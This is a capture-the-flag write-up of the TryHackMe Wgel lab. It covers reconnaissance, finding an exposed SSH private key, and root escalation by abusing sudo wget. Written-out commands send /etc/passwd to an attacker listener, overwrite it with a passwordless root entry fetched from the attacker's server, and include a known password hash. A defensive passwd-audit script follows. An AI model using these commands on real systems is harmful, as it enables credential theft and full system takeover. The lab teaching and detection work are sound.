Wgel CTF WriteUp [TryHackMe]

aayush malla
Oct 13, 2020

Today we will be doing the Wgel CTF lab on TryHackMe.

Here our task is to find two flags, i.e. the user flag and the root flag.

Now let's deploy the machine and then scan it using either nmap or zenmap.

Here I will be scanning the machine's IP address with nmap using the following command:

nmap -A ip_address

Here the -A flag means an aggressive scan, which includes OS detection, version detection, script scanning and traceroute.

fig: result of nmap

Here we can see that port 22 (ssh) and port 80 (http) are open, so let's visit the website using the IP address.

On visiting the website we found that the Apache2 Ubuntu default page is strange, as there is some blank space at the end.

fig: Normal Apache2 Debian Default Page
fig: Apache2 Default Page of the given lab’s website

As we can see, there is some white space, so let's inspect the page. On inspecting it we find a comment saying "Jessie Don't Forget to Update the Website".

fig : inspecting the apache2 default page of target machine

From this we know that one of the usernames is jessie.

Now let's use gobuster to identify the directories of the website.

gobuster dir -u http://ip -w /usr/share/wordlists/dirb/common.txt

Here we will be using common.txt as the wordlist.

fig : gobuster for http://ip

Here we can see that we have a directory /sitemap, so let's run gobuster again against http://ip/sitemap:

gobuster dir -u http://ip/sitemap -w /usr/share/wordlists/dirb/common.txt

fig: gobuster for http://ip/sitemap

Here we can see a /.ssh directory, so let's go to that page [http://ip/sitemap/.ssh].

Here we can see that there is an RSA private key, so let's copy the key, paste it into a file on our local machine, and change its permissions using the command: chmod 600 filename (filename: id_rsa in my case).

Now let's use this key to SSH into the target machine.

Command used:

ssh -i id_rsa jessie@ip

fig: ssh to the target machine

BINGO!!! We get SSH access to the target machine.

Now let's go to the Document directory and cat the user_flag.txt file to get the first flag, the user flag.

fig: user flag

Now we have to find the root flag, which is usually stored in the /root directory, but we can't go to the root directory.

Now let's check what our user jessie can run as root. For this, use the command

sudo -l

fig: checking the user privilege

Here we can see that jessie can run /usr/bin/wget as root, so let's use this misconfiguration to our benefit.

We will use wget to transfer the content of /etc/passwd to our local machine, create a new passwd file, and then transfer it back to the target machine.

First, let's transfer the content of /etc/passwd from the target machine to our local machine. For this, follow the steps below.

Use netcat to listen on a particular port: nc -lnvp 9090

fig: listening to port 9090 using netcat

Use wget to transfer the content of /etc/passwd to local machine

Now we will transfer the content of /etc/passwd to the local machine using the command

sudo /usr/bin/wget --post-file=/etc/passwd 10.9.120.205:9090

Copy the content of /etc/passwd received at our local machine and save it to a file named passwd.

fig: Getting the content of /etc/passwd of target machine to our local machine

This is the content we receive on our local machine, where we were listening using netcat.

Now let's copy the content and paste it into a new file named passwd.

Now change the 'x' in the root user entry of passwd to the magic password.

Here we can see the root entry, where x denotes that the password is saved in the file /etc/shadow. We can change the x to our magic password: U6aMy0wojraho

This magic password means that we don't have to enter a password (we just have to hit the Enter key).

Once we set x to this magic password, the system will not look into the /etc/shadow file for the root password.

fig : changing ‘x’ to magic password

Transfer the file back to the target machine

Now we will start a SimpleHTTPServer using Python to host the passwd file on our local machine, using the command

python -m SimpleHTTPServer 8080

fig : Running HTTP server in port 8080

Then we will use wget on the target machine to download the passwd file from our local machine and replace the target machine's /etc/passwd with it, using the command:

sudo /usr/bin/wget 10.9.120.205:8080/passwd -O /etc/passwd

fig: Downloading passwd from the HTTP server hosted on the local machine and replacing /etc/passwd with the downloaded passwd

Now let's change user to root, hit only the Enter key at the password prompt, then go to the /root directory and cat root_flag.txt.

fig: Getting root privilege and getting root flag

BINGO! We successfully get root privilege and then use it to print the root flag.
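On the defensive side, the /etc/passwd change described above is easy to detect: the password field of the root entry is no longer x. The check below is an added example, not part of the original write-up; it also goes slightly beyond the case shown here by flagging empty password fields and extra UID 0 accounts. The function names, the svc account and the sample file are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): audit a passwd-format file.
# Field 2 is normally "x" (hash kept in /etc/shadow); "*" or "!..." means locked.

audit_passwd() {
    # $1 = passwd-format file. Prints one finding per line.
    # Returns 1 if anything was flagged, 0 if the file looks clean.
    awk -F: '
        /^[ \t]*(#|$)/ { next }                  # skip comments and blank lines
        NF != 7 { print "MALFORMED line " NR; bad = 1; next }
        {
            if ($2 == "") {                      # account with no password at all
                print "EMPTY_PASSWORD " $1; bad = 1
            } else if ($2 != "x" && $2 != "*" && $2 !~ /^!/) {
                print "INLINE_HASH " $1; bad = 1 # hash stored in passwd itself
            }
            if ($3 == 0 && $1 != "root") {       # second superuser account
                print "EXTRA_UID0 " $1; bad = 1
            }
        }
        END { exit bad + 0 }
    ' "$1"
}

write_sample() {
    # Constructed sample: root carries the inline value from the write-up,
    # "svc" is a hypothetical extra UID 0 account, jessie is a normal entry.
    cat > "$1" <<'EOF'
root:U6aMy0wojraho:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jessie:x:1000:1000:jessie:/home/jessie:/bin/bash
svc:x:0:0:service:/home/svc:/bin/sh
EOF
}

sample=$(mktemp)
write_sample "$sample"
audit_passwd "$sample" || echo "tampering indicators found"
rm -f "$sample"
```

Run against /etc/passwd from a scheduled job or file-integrity check, this catches the overwrite after the fact; removing /usr/bin/wget from the sudoers entry seen in sudo -l removes the cause.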
